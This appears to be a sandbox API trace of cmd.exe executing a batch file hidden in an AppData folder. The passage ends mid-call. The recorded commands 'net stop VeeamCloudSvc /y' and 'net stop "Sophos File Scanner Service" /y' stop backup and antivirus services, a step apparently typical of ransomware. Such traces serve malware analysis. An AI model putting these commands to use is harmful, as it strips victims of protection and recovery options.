[0210.075] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0210.075] GetProcessHeap () returned 0x3e0000 [0210.075] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.075] GetProcessHeap () returned 0x3e0000 [0210.075] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.075] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.075] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x125e [0210.075] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x663, lpOverlapped=0x0) returned 1 [0210.075] SetFilePointer (in: hFile=0x74, lDistanceToMove=4729, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1279 [0210.075] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamCloudSvc /y\r\nTAFRAME /y\r\n /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 27 [0210.075] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.075] GetFileType (hFile=0x74) returned 0x1 [0210.075] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.076] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1279 [0210.076] GetProcessHeap () returned 0x3e0000 [0210.076] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.076] GetProcessHeap () returned 0x3e0000 [0210.076] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.079] _tell (_FileHandle=3) returned 4729 [0210.079] _close (_FileHandle=3) returned 0 [0210.079] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.079] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.079] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.079] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.079] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.079] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.079] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.079] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.079] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.079] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.079] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.079] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.079] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.079] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.079] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.079] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.079] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.079] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.079] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.079] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.080] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.080] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.080] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.080] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.080] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.080] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.080] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.080] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.080] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.080] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.080] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.080] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.080] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.080] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.080] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.080] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.080] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.080] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.080] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.080] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.080] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.080] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.080] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.080] SetErrorMode (uMode=0x0) returned 0x1 [0210.081] GetProcessHeap () returned 0x3e0000 [0210.081] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.081] GetProcessHeap () returned 0x3e0000 [0210.081] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.081] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.081] GetProcessHeap () returned 0x3e0000 [0210.081] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.081] GetProcessHeap () returned 0x3e0000 [0210.081] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.081] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.081] GetProcessHeap () returned 0x3e0000 [0210.081] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.082] GetProcessHeap () returned 0x3e0000 [0210.082] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.082] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.082] GetProcessHeap () returned 0x3e0000 [0210.082] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.082] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.083] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.083] GetLastError () returned 0x2 [0210.083] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.083] GetLastError () returned 0x2 [0210.084] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.084] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.084] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.085] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.085] GetLastError () returned 0x2 [0210.085] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.085] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.085] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.086] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.086] SetErrorMode (uMode=0x0) returned 0x1 [0210.086] GetProcessHeap () returned 0x3e0000 [0210.086] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.086] GetProcessHeap () returned 0x3e0000 [0210.086] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.087] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.087] GetProcessHeap () returned 0x3e0000 [0210.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.087] GetProcessHeap () returned 0x3e0000 [0210.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.087] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.087] GetProcessHeap () returned 0x3e0000 [0210.087] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.087] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.087] GetProcessHeap () returned 0x3e0000 [0210.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.088] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.088] GetProcessHeap () returned 0x3e0000 [0210.088] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.089] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.089] GetLastError () returned 0x2 [0210.089] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.089] GetLastError () returned 0x2 [0210.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.090] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.090] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.090] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.091] GetLastError () returned 0x2 [0210.091] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.091] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.091] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.091] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.092] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.092] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.092] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.092] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamCloudSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamCloudSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamCloudSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x38c, dwThreadId=0x360)) returned 1 [0210.096] CloseHandle (hObject=0x74) returned 1 [0210.096] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.096] GetProcessHeap () returned 0x3e0000 [0210.096] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.096] GetEnvironmentStringsW () returned 0x3f8408* [0210.096] GetProcessHeap () returned 0x3e0000 [0210.096] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.096] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.096] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0210.219] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0210.220] CloseHandle (hObject=0x78) returned 1 [0210.220] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0210.220] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.220] GetProcessHeap () returned 0x3e0000 [0210.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.220] GetEnvironmentStringsW () returned 0x3f8408* [0210.220] GetProcessHeap () returned 0x3e0000 [0210.220] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.220] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.220] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.220] GetProcessHeap () returned 0x3e0000 [0210.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.220] GetEnvironmentStringsW () returned 0x3f8408* [0210.221] GetProcessHeap () returned 0x3e0000 [0210.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.221] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.221] GetProcessHeap () returned 0x3e0000 [0210.221] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.221] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.221] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.221] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.221] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.221] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.221] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.221] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.221] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.221] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.222] SetConsoleInputExeNameW () returned 0x1 [0210.222] GetConsoleOutputCP () returned 0x1b5 [0210.222] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.222] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0210.222] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0210.222] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.222] SetFilePointer (in: hFile=0x78, lDistanceToMove=4729, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1279 [0210.222] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.223] GetProcessHeap () returned 0x3e0000 [0210.223] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.223] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.223] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1279 [0210.223] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x648, lpOverlapped=0x0) returned 1 [0210.223] SetFilePointer (in: hFile=0x78, lDistanceToMove=4776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a8 [0210.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=47, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 47 [0210.224] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.224] GetFileType (hFile=0x78) returned 0x1 [0210.224] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.224] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a8 [0210.224] GetProcessHeap () returned 0x3e0000 [0210.224] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.224] GetProcessHeap () returned 0x3e0000 [0210.224] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.227] _tell (_FileHandle=3) returned 4776 [0210.227] _close (_FileHandle=3) returned 0 [0210.227] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.227] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.227] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.227] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.227] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.227] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.227] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.227] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.228] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.228] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.228] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.228] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.228] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.228] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.228] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.228] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.228] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.228] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.228] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.228] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.228] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.228] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.228] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.228] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.228] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.228] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.228] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.228] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.228] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.228] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.228] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.228] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.228] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.228] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.228] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.228] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.228] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.228] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.228] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.228] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.228] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.228] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.229] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.229] SetErrorMode (uMode=0x0) returned 0x1 [0210.229] GetProcessHeap () returned 0x3e0000 [0210.229] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.229] GetProcessHeap () returned 0x3e0000 [0210.229] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.229] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.229] GetProcessHeap () returned 0x3e0000 [0210.229] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.229] GetProcessHeap () returned 0x3e0000 [0210.229] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.230] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.230] GetProcessHeap () returned 0x3e0000 [0210.230] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.230] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.230] GetProcessHeap () returned 0x3e0000 [0210.230] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.230] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.230] GetProcessHeap () returned 0x3e0000 [0210.230] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.231] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.231] GetLastError () returned 0x2 [0210.232] FindFirstFileExW (in: 